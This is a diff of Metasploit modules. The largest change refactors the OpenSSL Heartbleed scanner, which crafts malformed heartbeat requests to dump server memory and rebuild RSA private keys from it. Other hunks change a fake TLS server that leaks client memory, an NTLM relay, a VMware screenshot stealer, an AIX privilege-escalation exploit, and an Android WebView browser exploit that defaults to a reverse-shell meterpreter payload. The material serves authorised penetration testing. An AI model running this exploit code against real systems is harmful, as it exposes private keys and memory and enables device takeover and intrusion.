+    data.each_byte.map { |b| sprintf('%02X ', b) }.join.strip
+  end
+
+  # establishes a connect and parses the server response
+  def establish_connect
+    connect
+
+    unless tls_callback == 'None'
+      vprint_status("#{peer} - Trying to start SSL via #{tls_callback}")
+      res = self.send(TLS_CALLBACKS[tls_callback])
+      if res.nil?
+        vprint_error("#{peer} - STARTTLS failed...")
+        return nil
+      end
+    end
+
+    vprint_status("#{peer} - Sending Client Hello...")
+    sock.put(client_hello)
+
+    server_hello = sock.get(response_timeout)
+    unless server_hello
+      vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...")
+      return nil
+    end
+
+    server_resp_parsed = parse_ssl_record(server_hello)
+
+    if server_resp_parsed.nil?
+      vprint_error("#{peer} - Server Hello Not Found")
+      return nil
+    end
+
+    server_resp_parsed
+  end
+
+  # Generates a heartbeat request
+  def heartbeat_request(length)
+    payload = "\x01"              # Heartbeat Message Type: Request (1)
+    payload << [length].pack('n') # Payload Length: 65535
+
+    ssl_record(HEARTBEAT_RECORD_TYPE, payload)
+  end
+
+  # Generates, sends and receives a heartbeat message
   def bleed
-    # This actually performs the heartbleed portion
     connect_result = establish_connect
     return if connect_result.nil?
 
     vprint_status("#{peer} - Sending Heartbeat...")
-    sock.put(heartbeat(heartbeat_length))
-    hdr = sock.get_once(5, response_timeout)
-    if hdr.blank?
+    sock.put(heartbeat_request(heartbeat_length))
+    hdr = get_data(5)
+    if hdr.nil? || hdr.empty?
       vprint_error("#{peer} - No Heartbeat response...")
+      disconnect
       return
     end
 
@@ -320,33 +463,36 @@ class Metasploit3 < Msf::Auxiliary
 
     # try to get the TLS error
     if type == ALERT_RECORD_TYPE
-      res = sock.get_once(len, response_timeout)
+      res = get_data(len)
       alert_unp = res.unpack('CC')
       alert_level = alert_unp[0]
       alert_desc = alert_unp[1]
-      msg = "Unknown error"
+
       # http://tools.ietf.org/html/rfc5246#section-7.2
       case alert_desc
       when 0x46
-        msg = "Protocol error. Looks like the chosen protocol is not supported."
+        msg = 'Protocol error. Looks like the chosen protocol is not supported.'
+      else
+        msg = 'Unknown error'
       end
       vprint_error("#{peer} - #{msg}")
       disconnect
       return
     end
 
-    unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[datastore['TLS_VERSION']]
-      vprint_error("#{peer} - Unexpected Heartbeat response")
+    unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[tls_version]
+      vprint_error("#{peer} - Unexpected Heartbeat response header (#{to_hex_string(hdr)})")
       disconnect
       return
     end
 
-    heartbeat_data = sock.get(heartbeat_length) # Read the magic length...
+    heartbeat_data = get_data(heartbeat_length)
     vprint_status("#{peer} - Heartbeat response, #{heartbeat_data.length} bytes")
     disconnect
     heartbeat_data
   end
 
+  # Stores received data
   def loot_and_report(heartbeat_data)
 
     unless heartbeat_data
@@ -364,19 +510,19 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if action.name == 'DUMP' # Check mode, dump if requested.
-      pattern = datastore['DUMPFILTER']
+      pattern = dumpfilter
       if pattern
         match_data = heartbeat_data.scan(pattern).join
       else
         match_data = heartbeat_data
       end
       path = store_loot(
-        "openssl.heartbleed.server",
-        "application/octet-stream",
+        'openssl.heartbleed.server',
+        'application/octet-stream',
         rhost,
         match_data,
         nil,
-        "OpenSSL Heartbleed server memory"
+        'OpenSSL Heartbleed server memory'
       )
       print_status("#{peer} - Heartbeat data stored in #{path}")
     end
@@ -385,12 +531,12 @@ class Metasploit3 < Msf::Auxiliary
 
   end
 
-  def getkeys()
-    unless datastore['TLS_CALLBACK'] == 'None'
-      print_error('TLS callbacks currently unsupported for keydumping action') #TODO
-      return
-    end
+  #
+  # Keydumoing helper methods
+  #
 
+  # Tries to retreive the private key
+  def getkeys
     print_status("#{peer} - Scanning for private keys")
     count = 0
 
@@ -405,13 +551,16 @@ class Metasploit3 < Msf::Auxiliary
     vprint_status("#{peer} - e: #{e}")
     print_status("#{peer} - #{Time.now.getutc} - Starting.")
 
-    datastore['MAX_KEYTRIES'].times {
+    max_keytries.times {
       # Loop up to MAX_KEYTRIES times, looking for keys
-      if count % datastore['STATUS_EVERY'] == 0
+      if count % status_every == 0
         print_status("#{peer} - #{Time.now.getutc} - Attempt #{count}...")
       end
 
-      p, q = get_factors(bleed, n) # Try to find factors in mem
+      bleedresult = bleed
+      return unless bleedresult
+
+      p, q = get_factors(bleedresult, n) # Try to find factors in mem
 
       unless p.nil? || q.nil?
         key = key_from_pqe(p, q, e)
@@ -419,75 +568,32 @@ class Metasploit3 < Msf::Auxiliary
 
         print_status(key.export)
         path = store_loot(
-          "openssl.heartbleed.server",
-          "text/plain",
+          'openssl.heartbleed.server',
+          'text/plain',
           rhost,
           key.export,
           nil,
-          "OpenSSL Heartbleed Private Key"
+          'OpenSSL Heartbleed Private Key'
         )
         print_status("#{peer} - Private key stored in #{path}")
         return
       end
       count += 1
     }
-    print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES.")
+    print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.")
   end
 
-  def heartbeat(length)
-    payload = "\x01"              # Heartbeat Message Type: Request (1)
-    payload << [length].pack("n") # Payload Length: 65535
-
-    ssl_record(HEARTBEAT_RECORD_TYPE, payload)
-  end
-
-  def client_hello
-    # Use current day for TLS time
-    time_temp = Time.now
-    time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i
-
-    hello_data = [TLS_VERSION[datastore['TLS_VERSION']]].pack("n") # Version TLS
-    hello_data << [time_epoch].pack("N")    # Time in epoch format
-    hello_data << Rex::Text.rand_text(28)   # Random
-    hello_data << "\x00"                    # Session ID length
-    hello_data << [CIPHER_SUITES.length * 2].pack("n") # Cipher Suites length (102)
-    hello_data << CIPHER_SUITES.pack("n*")  # Cipher Suites
-    hello_data << "\x01"                    # Compression methods length (1)
-    hello_data << "\x00"                    # Compression methods: null
-
-    hello_data_extensions = "\x00\x0f"      # Extension type (Heartbeat)
-    hello_data_extensions << "\x00\x01"     # Extension length
-    hello_data_extensions << "\x01"         # Extension data
-
-    hello_data << [hello_data_extensions.length].pack("n")
-    hello_data << hello_data_extensions
-
-    data = "\x01\x00"                      # Handshake Type: Client Hello (1)
-    data << [hello_data.length].pack("n")  # Length
-    data << hello_data
-
-    ssl_record(HANDSHAKE_RECORD_TYPE, data)
-  end
-
-  def ssl_record(type, data)
-    record = [type, TLS_VERSION[datastore['TLS_VERSION']], data.length].pack('Cnn')
-    record << data
-  end
-
-  def get_ne()
-    # Fetch rhost's cert, return public key values
-    connect(true, {"SSL" => true}) #Force SSL
-    cert  = OpenSSL::X509::Certificate.new(sock.peer_cert)
-    disconnect
-
-    unless cert
+  # Returns the N and E params from the public server certificate
+  def get_ne
+    unless @cert
       print_error("#{peer} - No certificate found")
       return
     end
 
-    return cert.public_key.params["n"], cert.public_key.params["e"]
+    return @cert.public_key.params['n'], @cert.public_key.params['e']
   end
 
+  # Tries to find pieces of the private key in the provided data
   def get_factors(data, n)
     # Walk through data looking for factors of n
     psize = n.num_bits / 8 / 2
@@ -505,40 +611,11 @@ class Metasploit3 < Msf::Auxiliary
           return p, q
         end
       end
-      }
+    }
     return nil, nil
   end
 
-  def establish_connect
-    connect
-
-    unless datastore['TLS_CALLBACK'] == 'None'
-      vprint_status("#{peer} - Trying to start SSL via #{datastore['TLS_CALLBACK']}")
-      res = self.send(TLS_CALLBACKS[datastore['TLS_CALLBACK']])
-      if res.nil?
-        vprint_error("#{peer} - STARTTLS failed...")
-        return nil
-      end
-    end
-
-    vprint_status("#{peer} - Sending Client Hello...")
-    sock.put(client_hello)
-
-    server_hello = sock.get(response_timeout)
-    unless server_hello
-      vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...")
-      disconnect
-      return nil
-    end
-
-    unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE
-      vprint_error("#{peer} - Server Hello Not Found")
-      return nil
-    end
-
-    true
-  end
-
+  # Generates the private key from the P, Q and E values
   def key_from_pqe(p, q, e)
     # Returns an RSA Private Key from Factors
     key = OpenSSL::PKey::RSA.new()
@@ -559,5 +636,170 @@ class Metasploit3 < Msf::Auxiliary
     return key
   end
 
-end
+  #
+  # SSL/TLS packet methods
+  #
 
+  # Creates and returns a new SSL record with the provided data
+  def ssl_record(type, data)
+    record = [type, TLS_VERSION[tls_version], data.length].pack('Cnn')
+    record << data
+  end
+
+  # generates a CLIENT_HELLO ssl/tls packet
+  def client_hello
+    # Use current day for TLS time
+    time_temp = Time.now
+    time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i
+
+    hello_data = [TLS_VERSION[tls_version]].pack('n') # Version TLS
+    hello_data << [time_epoch].pack('N')    # Time in epoch format
+    hello_data << Rex::Text.rand_text(28)   # Random
+    hello_data << "\x00"                    # Session ID length
+    hello_data << [CIPHER_SUITES.length * 2].pack('n') # Cipher Suites length (102)
+    hello_data << CIPHER_SUITES.pack('n*')  # Cipher Suites
+    hello_data << "\x01"                    # Compression methods length (1)
+    hello_data << "\x00"                    # Compression methods: null
+
+    hello_data_extensions = "\x00\x0f"      # Extension type (Heartbeat)
+    hello_data_extensions << "\x00\x01"     # Extension length
+    hello_data_extensions << "\x01"         # Extension data
+
+    hello_data << [hello_data_extensions.length].pack('n')
+    hello_data << hello_data_extensions
+
+    data = "\x01\x00"                      # Handshake Type: Client Hello (1)
+    data << [hello_data.length].pack('n')  # Length
+    data << hello_data
+
+    ssl_record(HANDSHAKE_RECORD_TYPE, data)
+  end
+
+  # Parse SSL header
+  def parse_ssl_record(data)
+    ssl_records = []
+    remaining_data = data
+    ssl_record_counter = 0
+    while remaining_data && remaining_data.length > 0
+      ssl_record_counter += 1
+      ssl_unpacked = remaining_data.unpack('CH4n')
+      return nil if ssl_unpacked.nil? or ssl_unpacked.length < 3
+      ssl_type = ssl_unpacked[0]
+      ssl_version = ssl_unpacked[1]
+      ssl_len = ssl_unpacked[2]
+      vprint_debug("SSL record ##{ssl_record_counter}:")
+      vprint_debug("\tType:    #{ssl_type}")
+      vprint_debug("\tVersion: 0x#{ssl_version}")
+      vprint_debug("\tLength:  #{ssl_len}")
+      if ssl_type != HANDSHAKE_RECORD_TYPE
+        vprint_debug("\tWrong Record Type! (#{ssl_type})")
+      else
+        ssl_data = remaining_data[5, ssl_len]
+        handshakes = parse_handshakes(ssl_data)
+        ssl_records << {
+            :type => ssl_type,
+            :version => ssl_version,
+            :length => ssl_len,
+            :data => handshakes
+        }
+      end
+      remaining_data = remaining_data[(ssl_len + 5)..-1]
+    end
+
+    ssl_records
+  end
+
+  # Parse Handshake data returned from servers
+  def parse_handshakes(data)
+    # Can contain multiple handshakes
+    remaining_data = data
+    handshakes = []
+    handshake_count = 0
+    while remaining_data && remaining_data.length > 0
+      hs_unpacked = remaining_data.unpack('CCn')
+      next if hs_unpacked.nil? or hs_unpacked.length < 3
+      hs_type = hs_unpacked[0]
+      hs_len_pad = hs_unpacked[1]
+      hs_len = hs_unpacked[2]
+      hs_data = remaining_data[4, hs_len]
+      handshake_count += 1
+      vprint_debug("\tHandshake ##{handshake_count}:")
+      vprint_debug("\t\tLength: #{hs_len}")
+
+      handshake_parsed = nil
+      case hs_type
+        when HANDSHAKE_SERVER_HELLO_TYPE
+          vprint_debug("\t\tType:   Server Hello (#{hs_type})")
+          handshake_parsed = parse_server_hello(hs_data)
+        when HANDSHAKE_CERTIFICATE_TYPE
+          vprint_debug("\t\tType:   Certificate Data (#{hs_type})")
+          handshake_parsed = parse_certificate_data(hs_data)
+        when HANDSHAKE_KEY_EXCHANGE_TYPE
+          vprint_debug("\t\tType:   Server Key Exchange (#{hs_type})")
+          # handshake_parsed = parse_server_key_exchange(hs_data)
+        when HANDSHAKE_SERVER_HELLO_DONE_TYPE
+          vprint_debug("\t\tType:   Server Hello Done (#{hs_type})")
+        else
+          vprint_debug("\t\tType:   Handshake type #{hs_type} not implemented")
+      end
+
+      handshakes << {
+          :type     => hs_type,
+          :len      => hs_len,
+          :data     => handshake_parsed
+      }
+      remaining_data = remaining_data[(hs_len + 4)..-1]
+    end
+
+    handshakes
+  end
+
+  # Parse Server Hello message
+  def parse_server_hello(data)
+    version = data.unpack('H4')[0]
+    vprint_debug("\t\tServer Hello Version:           0x#{version}")
+    random = data[2,32].unpack('H*')[0]
+    vprint_debug("\t\tServer Hello random data:       #{random}")
+    session_id_length = data[34,1].unpack('C')[0]
+    vprint_debug("\t\tServer Hello Session ID length: #{session_id_length}")
+    session_id = data[35,session_id_length].unpack('H*')[0]
+    vprint_debug("\t\tServer Hello Session ID:        #{session_id}")
+    # TODO Read the rest of the server hello (respect message length)
+
+    # TODO: return hash with data
+    true
+  end
+
+  # Parse certificate data
+  def parse_certificate_data(data)
+    # get certificate data length
+    unpacked = data.unpack('Cn')
+    cert_len_padding = unpacked[0]
+    cert_len = unpacked[1]
+    vprint_debug("\t\tCertificates length: #{cert_len}")
+    # contains multiple certs
+    already_read = 3
+    cert_counter = 0
+    while already_read < cert_len
+      start = already_read
+      cert_counter += 1
+      # get single certificate length
+      single_cert_unpacked = data[start, 3].unpack('Cn')
+      single_cert_len_padding = single_cert_unpacked[0]
+      single_cert_len =  single_cert_unpacked[1]
+      vprint_debug("\t\tCertificate ##{cert_counter}:")
+      vprint_debug("\t\t\tCertificate ##{cert_counter}: Length: #{single_cert_len}")
+      certificate_data = data[(start + 3), single_cert_len]
+      cert = OpenSSL::X509::Certificate.new(certificate_data)
+      # First received certificate is the one from the server
+      @cert = cert if @cert.nil?
+      #vprint_debug("Got certificate: #{cert.to_text}")
+      vprint_debug("\t\t\tCertificate ##{cert_counter}: #{cert.inspect}")
+      already_read = already_read + single_cert_len + 3
+    end
+
+    # TODO: return hash with data
+    true
+  end
+
+end
diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb
index 9c037550bd..97cbd4664c 100644
--- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb
+++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
       'headers' => { 'Authorization' => "Basic #{@user_pass}"}
     }, 25)
     if res
-      @vim_cookie = res.headers['Set-Cookie']
+      @vim_cookie = res.get_cookies
       if res.code== 200
         res.body.scan(/<a href="([\w\/\?=&;%]+)">/) do |match|
           link = match[0]
@@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary
       'headers' => { 'Authorization' => "Basic #{@user_pass}"}
     }, 25)
     if res
-      @vim_cookie = res.headers['Set-Cookie']
+      @vim_cookie = res.get_cookies
       if res.code == 200
         img = res.body
         ss_path = store_loot("host.vmware.screenshot", "image/png", datastore['RHOST'], img, name , "Screenshot of VM #{name}")
diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb
index 1340702f4f..cdbc2af39f 100644
--- a/modules/auxiliary/scanner/vnc/vnc_login.rb
+++ b/modules/auxiliary/scanner/vnc/vnc_login.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
       },
       'Author'      =>
         [
-          'carstein <carstein.sec [at] gmail [dot] com>',
+          'carstein <carstein.sec[at]gmail.com>',
           'jduck'
         ],
       'References'     =>
diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb
index e5bfe4631b..dc41935c48 100644
--- a/modules/auxiliary/server/http_ntlmrelay.rb
+++ b/modules/auxiliary/server/http_ntlmrelay.rb
@@ -269,11 +269,6 @@ class Metasploit3 < Msf::Auxiliary
     theaders = ('Authorization: NTLM ' << hash << "\r\n" <<
           "Connection: Keep-Alive\r\n" )
 
-    if (method == 'POST')
-      theaders << 'Content-Length: ' <<
-        (@finalputdata.length + 4).to_s()<< "\r\n"
-    end
-
     # HTTP_HEADERFILE is how this module supports cookies, multipart forms, etc
     if datastore['HTTP_HEADERFILE'] != nil
       print_status("Including extra headers from: #{datastore['HTTP_HEADERFILE']}")
diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
index cc6a75cd86..f24a46fedf 100644
--- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
+++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
       'Description'    => %q{
         This module provides a fake SSL service that is intended to
         leak memory from client systems as they connect. This module is
-        hardcoded for TLS/1.1 using the AES-128-CBC-SHA1 cipher.
+        hardcoded for using the AES-128-CBC-SHA1 cipher.
       },
       'Author'         =>
         [
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary
 
   # Process cleartext TLS messages
   def process_openssl_cleartext_request(c, data)
-    message_type, message_version = data.unpack("Cn")
+    message_type, message_version, protocol_version = data.unpack("Cn@9n")
 
     if message_type == 0x15 and data.length >= 7
       message_level, message_reason = data[5,2].unpack("CC")
@@ -160,19 +160,12 @@ class Metasploit3 < Msf::Auxiliary
 
       print_status("#{@state[c][:name]} Processing Client Hello...")
 
-      # Ignore clients that do not support heartbeat requests
-      unless data.index("\x0F\x00\x01\x01")
-        print_status("#{@state[c][:name]} Client does not support heartbeats")
-        c.close
-        return
-      end
-
       # Extract the client_random needed to compute the master key
       @state[c][:client_random]  = data[11,32]
       @state[c][:received_hello] = true
 
       print_status("#{@state[c][:name]} Sending Server Hello...")
-      openssl_send_server_hello(c, data)
+      openssl_send_server_hello(c, data, protocol_version)
       return
     end
 
@@ -203,7 +196,7 @@ class Metasploit3 < Msf::Auxiliary
     else
       # Send heartbeat requests
       if @state[c][:heartbeats].length < heartbeat_limit
-        openssl_send_heartbeat(c)
+        openssl_send_heartbeat(c, protocol_version)
       end
 
       # Process cleartext heartbeat replies
@@ -223,7 +216,7 @@ class Metasploit3 < Msf::Auxiliary
 
   # Process encrypted TLS messages
   def process_openssl_encrypted_request(c, data)
-    message_type, message_version = data.unpack("Cn")
+    message_type, message_version, protocol_version = data.unpack("Cn@9n")
 
     return if @state[c][:shutdown]
     return unless data.length > 5
@@ -244,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary
 
     # Send heartbeat requests
     if @state[c][:heartbeats].length < heartbeat_limit
-      openssl_send_heartbeat(c)
+      openssl_send_heartbeat(c, protocol_version)
     end
 
     # Process heartbeat replies
@@ -305,47 +298,55 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   # Send an OpenSSL Server Hello response
-  def openssl_send_server_hello(c, hello)
+  def openssl_send_server_hello(c, hello, version)
+
+    # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the
+    # first cipher suite sent by the client.
+    if @state[c][:encrypted]
+      cipher = "\x00\x2F"
+    else
+      cipher = hello[46, 2]
+    end
 
     # Create the Server Hello response
     extensions =
       "\x00\x0f\x00\x01\x01"       # Heartbeat
 
     server_hello_payload =
-      "\x03\x02" +                 # TLS Version 1.1
+      [version].pack('n') +        # Use the protocol version sent by the client.
       @state[c][:server_random] +  # Random (Timestamp + Random Bytes)
       "\x00" +                     # Session ID
-      "\x00\x2F" +                 # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)
+      cipher +                     # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)
       "\x00" +                     # Compression Method (none)
       [extensions.length].pack('n') + extensions
 
     server_hello = [0x02].pack("C") + [ server_hello_payload.length ].pack("N")[1,3] + server_hello_payload
 
-    msg1 = "\x16\x03\x02" + [server_hello.length].pack("n") + server_hello
+    msg1 = "\x16" + [version].pack('n') + [server_hello.length].pack("n") + server_hello
     c.put(msg1)
 
     # Skip the rest of TLS if we arent negotiating it
     unless negotiate_tls?
       # Send a heartbeat request to start the stream and return
-      openssl_send_heartbeat(c)
+      openssl_send_heartbeat(c, version)
       return
     end
 
     # Certificates
     certs_combined = generate_certificates
     pay2 = "\x0b" + [ certs_combined.length + 3 ].pack("N")[1, 3] + [ certs_combined.length ].pack("N")[1, 3] + certs_combined
-    msg2 = "\x16\x03\x02" + [pay2.length].pack("n") + pay2
+    msg2 = "\x16" + [version].pack('n') + [pay2.length].pack("n") + pay2
     c.put(msg2)
 
     # End of Server Hello
     pay3 = "\x0e\x00\x00\x00"
-    msg3 = "\x16\x03\x02" + [pay3.length].pack("n") + pay3
+    msg3 = "\x16" + [version].pack('n') + [pay3.length].pack("n") + pay3
     c.put(msg3)
   end
 
   # Send the heartbeat request that results in memory exposure
-  def openssl_send_heartbeat(c)
-    c.put "\x18\x03\x02\x00\x03\x01" + [heartbeat_read_size].pack("n")
+  def openssl_send_heartbeat(c, version)
+    c.put "\x18" + [version].pack('n') + "\x00\x03\x01" + [heartbeat_read_size].pack("n")
   end
 
   # Pack the certificates for use in the TLS reply
diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb
index 90a82a9127..29662565ae 100644
--- a/modules/auxiliary/sniffer/psnuffle.rb
+++ b/modules/auxiliary/sniffer/psnuffle.rb
@@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary
   def initialize
     super(
       'Name'				=> 'pSnuffle Packet Sniffer',
-      'Description'       => 'This module sniffs passwords like dsniff did in the past',
-      'Author'			=> 'Max Moser  <mmo@remote-exploit.org>',
+      'Description' => 'This module sniffs passwords like dsniff did in the past',
+      'Author'			=> 'Max Moser <mmo[at]remote-exploit.org>',
       'License'			=> MSF_LICENSE,
       'Actions'			=>
         [
diff --git a/modules/encoders/mipsbe/byte_xori.rb b/modules/encoders/mipsbe/byte_xori.rb
index b5647b87ca..f577ba023c 100644
--- a/modules/encoders/mipsbe/byte_xori.rb
+++ b/modules/encoders/mipsbe/byte_xori.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::Xor
       },
       'Author'           =>
         [
-          'Julien Tinnes <julien at cr0.org>', # original longxor encoder, which this one is based on
+          'Julien Tinnes <julien[at]cr0.org>', # original longxor encoder, which this one is based on
           'juan vazquez' # byte_xori encoder
         ],
       'Arch'             => ARCH_MIPSBE,
diff --git a/modules/encoders/mipsbe/longxor.rb b/modules/encoders/mipsbe/longxor.rb
index ebc26b0e66..08d60cf333 100644
--- a/modules/encoders/mipsbe/longxor.rb
+++ b/modules/encoders/mipsbe/longxor.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Encoder::Xor
       'Description'      => %q{
         Mips Web server exploit friendly xor encoder
       },
-      'Author'           => 'Julien Tinnes <julien at cr0.org>',
+      'Author'           => 'Julien Tinnes <julien[at]cr0.org>',
       'Arch'             => ARCH_MIPSBE,
       'License'          => MSF_LICENSE,
       'Decoder'          =>
diff --git a/modules/encoders/mipsle/byte_xori.rb b/modules/encoders/mipsle/byte_xori.rb
index 3bca8f7e75..b15a47e1af 100644
--- a/modules/encoders/mipsle/byte_xori.rb
+++ b/modules/encoders/mipsle/byte_xori.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::Xor
       },
       'Author'           =>
         [
-          'Julien Tinnes <julien at cr0.org>', # original longxor encoder, which this one is based on
+          'Julien Tinnes <julien[at]cr0.org>', # original longxor encoder, which this one is based on
           'juan vazquez' # byte_xori encoder
         ],
       'Arch'             => ARCH_MIPSLE,
diff --git a/modules/encoders/mipsle/longxor.rb b/modules/encoders/mipsle/longxor.rb
index d397a9e70c..fab734bcd2 100644
--- a/modules/encoders/mipsle/longxor.rb
+++ b/modules/encoders/mipsle/longxor.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Encoder::Xor
       'Description'      => %q{
         Mips Web server exploit friendly xor encoder
       },
-      'Author'           => 'Julien Tinnes <julien at cr0.org>',
+      'Author'           => 'Julien Tinnes <julien[at]cr0.org>',
       'Arch'             => ARCH_MIPSLE,
       'License'          => MSF_LICENSE,
       'Decoder'          =>
diff --git a/modules/encoders/x86/opt_sub.rb b/modules/encoders/x86/opt_sub.rb
index 6e3e31ba10..c664c7231a 100644
--- a/modules/encoders/x86/opt_sub.rb
+++ b/modules/encoders/x86/opt_sub.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Encoder
         This adds 3-bytes to the start of the payload to bump ESP by 32 bytes
         so that it's clear of the top of the payload.
       },
-      'Author'           => 'OJ Reeves <oj@buffered.io>',
+      'Author'           => 'OJ Reeves <oj[at]buffered.io>',
       'Arch'             => ARCH_X86,
       'License'          => MSF_LICENSE,
       'Decoder'          => { 'BlockSize'  => 4 }
diff --git a/modules/exploits/aix/local/ibstat_path.rb b/modules/exploits/aix/local/ibstat_path.rb
index cb424c1cfe..1ac45dfa97 100644
--- a/modules/exploits/aix/local/ibstat_path.rb
+++ b/modules/exploits/aix/local/ibstat_path.rb
@@ -110,8 +110,22 @@ chmod 4555 #{root_file}
     cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")
     cmd_exec("export PATH")
 
+    print_status("Finding interface name...")
+    iface = ""
+    cmd_exec("lsdev -Cc if").each_line do |line|
+      if line.match(/^[a-z]+[0-9]+\s+Available/) and not line.match(/^lo[0-9]/)
+        iface = line.split(/\s+/)[0]
+        print_status("Found interface #{iface}.")
+        break
+      end
+    end
+    if iface == ""
+      iface = "en0"
+      print_status("Found no interface, defaulting to en0.")
+    end
+
     print_status("Triggering vulnerablity...")
-    cmd_exec("/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null")
+    cmd_exec("/usr/bin/ibstat -a -i #{iface} 2>/dev/null >/dev/null")
 
     # The $PATH variable must be restored before the payload is executed
     # in cases where an euid root shell was gained
diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
index 40c5461117..3fcbe9455f 100644
--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -4,15 +4,16 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/android'
 
 class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::BrowserExploitServer
   include Msf::Exploit::Remote::BrowserAutopwn
+  include Msf::Exploit::Android
 
-  autopwn_info({
-    :os_flavor  => "Android",
-    :arch       => ARCH_ARMLE,
+  autopwn_info(
+    :os_flavor  => 'Android',
     :javascript => true,
     :rank       => ExcellentRanking,
     :vuln_test  => %Q|
@@ -23,12 +24,12 @@ class Metasploit3 < Msf::Exploit::Remote
         } catch(e) {}
       }
     |
-  })
+  )
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'Android Browser and WebView addJavascriptInterface Code Execution',
-      'Description' => %q{
+      'Name'                => 'Android Browser and WebView addJavascriptInterface Code Execution',
+      'Description'         => %q{
             This module exploits a privilege escalation issue in Android < 4.2's WebView component
           that arises when untrusted Javascript code is executed by a WebView that has one or more
           Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
@@ -46,75 +47,107 @@ class Metasploit3 < Msf::Exploit::Remote
 
           Note: Adding a .js to the URL will return plain javascript (no HTML markup).
       },
-      'License'     => MSF_LICENSE,
-      'Author'      => [
+      'License'             => MSF_LICENSE,
+      'Author'              => [
         'jduck', # original msf module
         'joev'   # static server
       ],
-      'References'     => [
+      'References'          => [
         ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
         ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
         ['URL', 'http://50.56.33.56/blog/?p=314'],
         ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
-        ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py']
+        ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
+        ['CVE', '2012-6636'], # original CVE for addJavascriptInterface
+        ['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
+        ['EDB', '31519'],
+        ['OSVDB', '97520']
       ],
-      'Platform'       => 'linux',
-      'Arch'           => ARCH_ARMLE,
-      'DefaultOptions' => { 'PrependFork' => true },
-      'Targets'        => [ [ 'Automatic', {} ] ],
-      'DisclosureDate' => 'Dec 21 2012',
-      'DefaultTarget'  => 0,
+      'Platform'            => 'android',
+      'Arch'                => ARCH_DALVIK,
+      'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
+      'Targets'             => [ [ 'Automatic', {} ] ],
+      'DisclosureDate'      => 'Dec 21 2012',
+      'DefaultTarget'       => 0,
       'BrowserRequirements' => {
-        :source  => 'script',
-        :os_flavor  => "Android",
-        :arch       => ARCH_ARMLE
+        :source     => 'script',
+        :os_flavor  => 'Android'
       }
     ))
   end
 
+  # Hooked to prevent BrowserExploitServer from attempting to do JS detection
+  # on requests for the static javascript file
   def on_request_uri(cli, req)
-    if req.uri.end_with?('js')
-      print_status("Serving javascript")
-      send_response(cli, js, 'Content-type' => 'text/javascript')
+    if req.uri =~ /\.js/
+      serve_static_js(cli, req)
     else
       super
     end
   end
 
+  # The browser appears to be vulnerable, serve the exploit
   def on_request_exploit(cli, req, browser)
-    print_status("Serving exploit HTML")
-    send_response_html(cli, html)
+    arch = normalize_arch(browser[:arch])
+    print_status "Serving #{arch} exploit..."
+    send_response_html(cli, html(arch))
   end
 
-  def js
+  # Called when a client requests a .js route.
+  # This is handy for post-XSS.
+  def serve_static_js(cli, req)
